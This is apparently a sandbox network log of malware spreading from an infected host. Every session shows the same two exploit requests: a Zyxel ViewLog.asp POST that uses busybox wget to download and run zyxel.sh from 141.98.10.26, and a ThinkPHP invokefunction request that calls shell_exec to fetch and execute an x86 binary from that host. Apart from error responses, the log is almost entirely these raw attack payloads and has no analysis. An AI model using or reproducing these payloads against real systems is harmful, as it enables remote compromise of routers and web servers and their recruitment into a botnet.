Nov 22, 2023 08:38:40.908862114 CET	6109	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:30.053915977 CET	12160	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.23	54618	62.113.230.74	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:53.650288105 CET	636	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:53.835864067 CET	640	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 22 Nov 2023 07:37:53 GMT Server: Varnish X-Varnish: 17003279 Location: https://192.168.0.14:80/cgi-bin/ViewLog.asp Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.23	58986	95.247.124.41	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:53.859997988 CET	665	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:54.065531969 CET	667	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:37:52 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.23	39916	94.122.222.63	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:53.885099888 CET	665	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.23	39292	31.33.14.237	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:54.855041981 CET	749	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:57.906829119 CET	1035	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.23	40668	31.134.100.79	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:54.900249004 CET	772	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:55.129000902 CET	777	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:41:58 GMT Server: Apache/2.4.57 (Debian) Content-Length: 304 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.57 (Debian) Server at 192.168.0.14 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.23	52108	31.200.125.62	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:54.902597904 CET	773	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.23	45096	112.186.187.244	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:59.848525047 CET	1222	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.23	49254	112.126.72.141	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:59.865506887 CET	1223	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:00.170314074 CET	1250	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:00 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.23	58408	112.125.166.91	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:59.866050959 CET	1223	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:00.172806025 CET	1251	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:35:07 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.23	56224	112.124.215.13	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:59.868355036 CET	1224	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.23	35332	95.100.116.73	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:00.057084084 CET	1247	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:00.265549898 CET	1322	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:38:00 GMT Date: Wed, 22 Nov 2023 07:38:00 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 31 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 30 36 33 38 36 38 30 26 23 34 36 3b 62 65 37 65 64 38 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.318e2117.1700638680.be7ed88</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.23	44216	95.46.201.145	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:00.058353901 CET	1248	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:00.277354956 CET	1323	IN	HTTP/1.1 505 HTTP Version not supported Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'none' Strict-Transport-Security: max-age=3600 Content-Length: 140 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.23	52974	95.66.130.204	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:00.066287041 CET	1249	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:00.284305096 CET	1324	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Wed, 22 Nov 2023 07:38:00 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.23	56632	31.136.146.82	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:01.392218113 CET	1495	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:04.561980009 CET	1802	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:10.705040932 CET	2562	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:22.735336065 CET	3942	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:47.052041054 CET	6927	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:36.197073936 CET	12888	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.23	51912	94.10.231.57	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:01.392786980 CET	1495	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
